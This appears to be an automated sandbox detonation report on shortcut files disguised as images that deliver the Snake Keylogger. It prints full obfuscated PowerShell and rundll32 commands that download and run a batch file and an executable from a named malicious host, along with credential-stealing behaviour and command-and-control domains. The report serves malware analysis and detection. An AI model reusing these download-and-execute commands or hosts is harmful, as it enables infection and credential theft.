cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" Cmd /C pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

Network

N/A

Files

memory/2720-40-0x000000001B8D0000-0x000000001BBB2000-memory.dmp

memory/2720-41-0x0000000001D80000-0x0000000001D88000-memory.dmp

memory/2720-42-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

memory/2720-43-0x0000000002EF0000-0x0000000002F70000-memory.dmp

memory/2720-44-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

memory/2720-47-0x0000000002EF0000-0x0000000002F70000-memory.dmp

memory/2720-46-0x0000000002EF0000-0x0000000002F70000-memory.dmp

memory/2720-45-0x0000000002EF0000-0x0000000002F70000-memory.dmp

memory/2720-48-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win10v2004-20231222-en

Max time kernel

143s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

Signatures

Snake Keylogger

stealer keylogger snakekeylogger

Snake Keylogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4128 set thread context of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\system32\rundll32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\MuiCache C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\rundll32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3852 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 3852 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 1676 wrote to memory of 4184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 4184 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4184 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4184 wrote to memory of 3168 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 3168 wrote to memory of 2376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 3168 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3168 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4464 wrote to memory of 220 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 4464 wrote to memory of 220 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\rundll32.exe
PID 3168 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 3168 wrote to memory of 1188 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 2356 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 2356 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\DeviceCredentialDeployment.exe
PID 2356 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2356 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2356 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2356 wrote to memory of 5116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 3168 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 5104 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3168 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 3168 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\conhost.exe
PID 5060 wrote to memory of 4128 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe
PID 5060 wrote to memory of 4128 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe
PID 5060 wrote to memory of 4128 N/A C:\Windows\system32\conhost.exe C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
PID 4128 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Image012.png.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" Cmd /C pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

pOwerShEll.eXe -EX bYPASs -NOp -W hiDDEN -eC IABpAG4AVgBPAGsARQAtAFcARQBCAHIAZQBxAFUARQBTAFQAIAAJAC0AVQBSAEkAIAAJAB0gaAB0AHQAcAA6AC8ALwB2AHkAYgBzAG4AZgAzAC4AcwBhAC4AYwBvAG0ALwBtAGUAZAAuAGIAYQB0AB0gIAAJAC0AbwBVAHQARgBpAEwARQAgAAkAHSAkAEUAbgBWADoAVABlAE0AUABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAACQA7ACAASQBOAFYAbwBrAGUALQBpAFQARQBtACAACQAdICQARQBOAHYAOgB0AEUAbQBwAFwAagByAGIAYgBzAGYAcgAuAGIAYQB0AB0g

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat" "

C:\Windows\system32\DeviceCredentialDeployment.exe

DEVIcECRedentIALdEPLOymEnt

C:\Windows\system32\rundll32.exe

RUNDll32 inEtcpL.CPl , ClearMyTracksByProcess 8

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

C:\Windows\system32\rundll32.exe

rundLl32 C:\Windows\sYStEm32\SHiMGVW.dLl , ImageView_FullscreenA http://vybsnf3.sa.com/jertrs.exe

C:\Windows\system32\DeviceCredentialDeployment.exe

dEvicEcredeNTiAldEPlOYMeNT

C:\Windows\system32\timeout.exe

timEout /T 7 /nObREAK

C:\Windows\system32\taskkill.exe

TAskkilL.Exe /F /Im rUNdlL32.exE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c DIr C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\ /s /B

C:\Windows\system32\conhost.exe

CoNhOsT C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 vybsnf3.sa.com udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 190.120.93.172.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 172.93.120.190:80 vybsnf3.sa.com tcp
US 8.8.8.8:53 checkip.dyndns.org udp
US 158.101.44.242:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 172.67.177.134:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 242.44.101.158.in-addr.arpa udp
US 8.8.8.8:53 134.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 varders.kozow.com udp
FR 51.38.247.67:8081 varders.kozow.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 aborters.duckdns.org udp
NL 91.92.255.235:8081 aborters.duckdns.org tcp
US 8.8.8.8:53 235.255.92.91.in-addr.arpa udp
US 8.8.8.8:53 179.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ns1iedlr.ifu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4184-9-0x000001DF30C60000-0x000001DF30C82000-memory.dmp

memory/4184-10-0x00007FFA58680000-0x00007FFA59141000-memory.dmp

memory/4184-11-0x000001DF30CE0000-0x000001DF30CF0000-memory.dmp

memory/4184-12-0x000001DF30CE0000-0x000001DF30CF0000-memory.dmp

memory/4184-18-0x00007FFA58680000-0x00007FFA59141000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\jrbbsfr.bat

MD5 885e4bf9c36d1964f751bca33e898503
SHA1 4055100dda8ee3845cfda6735900c556d8c19ca1
SHA256 5efe4bb30df918412651e2060b234aac78f108793c2a25500aca8488ada3ab2a
SHA512 5da165cb4571777b53fbf324dabd63e73b7af94a88d0b08da8a0d28db1f6b947ad41494331be734836d2b5cb7ef090f1eed1e73b8ed9deb2fb9a37c4873691e3

C:\Users\Admin\AppData\Local\Temp\lxRipDbgv6WP.BAT

MD5 39aceb0c8a015a4e8f66498e03ff16db
SHA1 4707695dece3a70bfbe55868d059a22e4325eaf0
SHA256 7eec1caeee2e9781635bc00daf1c0dbf98ec325625776afc4fb621e2eabd4527
SHA512 0cc87584d277036c2f94f25484beeb60b07adcb1ccc90b6ddfc1e6521944c35f87cc2c9f15a2b2b453a1cd8e9c0c16ade7d6ceb4f6b082c4be6f8d1aaf8a53dc

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7V1N9ZS9\jertrs[1].exe

MD5 b07832ec5f73ae5f2888ebab2aa5283a
SHA1 cb11a9e432df439fde94b6a3b3677d0112cac3c5
SHA256 dc613f5e91169b3744adfc0f6c968e3501c4bc1221ce12bdaa948ce9e5a1da21
SHA512 7a3233303f57b57e72eaabd792796339611daa39bea2279ff1879a2728afc3b6cbb25cb9b66f96f86deda3aa7fda95cab07f0a549981dddbbb4f71c25132da15

C:\Users\Admin\AppData\Local\micROsOfT\WInDOwS\InEtCAChe\ie\7V1N9ZS9\jertrs[1].exe

MD5 ec5031625d0458f61b9ce0b9115e9b24
SHA1 bf4e8ad7bfa02fb651b5afb75bcfe2f0e75978b9
SHA256 255275e570fe7745e01411f4793511b19f5a8562ea85f92160793592136520d3
SHA512 7323beb6ddf25c8ead15f565895cc86f4514ef2f3cf25df2672b1df3c5a6fc22987a258a7ded375d942ebab1afc079c1d145db0b60767c98667d04e1840d5fc3

memory/4128-34-0x0000000002340000-0x0000000002341000-memory.dmp

memory/4128-32-0x0000000076F52000-0x0000000076F53000-memory.dmp

memory/4128-37-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-39-0x0000000074BA0000-0x0000000074CFD000-memory.dmp

memory/4128-40-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-43-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-42-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-44-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-45-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-46-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-47-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-53-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-57-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-55-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-59-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-61-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-62-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-64-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-67-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-68-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-69-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-70-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-71-0x0000000000690000-0x0000000000790000-memory.dmp

memory/4128-72-0x0000000000400000-0x000000000054B000-memory.dmp

memory/4128-74-0x0000000002550000-0x0000000002558000-memory.dmp

memory/4128-75-0x0000000000690000-0x0000000000790000-memory.dmp

memory/964-76-0x0000000000400000-0x000000000042B000-memory.dmp

memory/964-81-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

memory/964-80-0x0000000076F52000-0x0000000076F53000-memory.dmp

memory/4128-82-0x0000000002550000-0x0000000002558000-memory.dmp

memory/4128-79-0x0000000074BA0000-0x0000000074CFD000-memory.dmp

memory/4128-78-0x0000000000400000-0x000000000054B000-memory.dmp

memory/964-83-0x0000000000400000-0x0000000000426000-memory.dmp

memory/964-85-0x0000000005B70000-0x0000000006114000-memory.dmp

memory/964-86-0x00000000054C0000-0x000000000555C000-memory.dmp

memory/964-84-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/964-87-0x0000000073900000-0x00000000740B0000-memory.dmp

memory/964-88-0x0000000006830000-0x0000000006880000-memory.dmp

memory/964-89-0x0000000006A50000-0x0000000006C12000-memory.dmp

memory/964-90-0x0000000006920000-0x00000000069B2000-memory.dmp

memory/964-91-0x00000000068B0000-0x00000000068BA000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win7-20231129-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" CmD /C powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powersHElL -EX bYPASS -nop -w hIddEn -ec IAAgAEkAbgBWAG8AawBlAC0AdwBFAGIAcgBFAFEAdQBlAFMAdAAgAAkALQBVAFIAaQAgAAkAHSBoAHQAdABwADoALwAvAHYAeQBiAHMAbgBmADMALgBzAGEALgBjAG8AbQAvAG0AZQBkAC4AYgBhAHQAHSAgAAkALQBPAFUAVABmAEkAbABFACAAHSAkAEUATgB2ADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdICAAOwAgAGkATgB2AG8AawBFAC0ASQB0AGUATQAgAAkAHSAkAEUAbgBWADoAVABlAG0AcABcAGoAcgBiAGIAcwBmAHIALgBiAGEAdAAdIA==

Network

N/A

Files

memory/2688-40-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2688-41-0x00000000028A0000-0x00000000028A8000-memory.dmp

memory/2688-42-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/2688-43-0x0000000002D20000-0x0000000002DA0000-memory.dmp

memory/2688-44-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/2688-45-0x0000000002D20000-0x0000000002DA0000-memory.dmp

memory/2688-48-0x000007FEF5D50000-0x000007FEF66ED000-memory.dmp

memory/2688-47-0x0000000002D20000-0x0000000002DA0000-memory.dmp

memory/2688-46-0x0000000002D20000-0x0000000002DA0000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-01-31 08:13

Reported

2024-01-31 08:16

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

157s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Photo01.jpg.lnk

Signatures

Snake Keylogger

stealer keylogger snakekeylogger

Snake Keylogger payload

Description Indicator Process Target
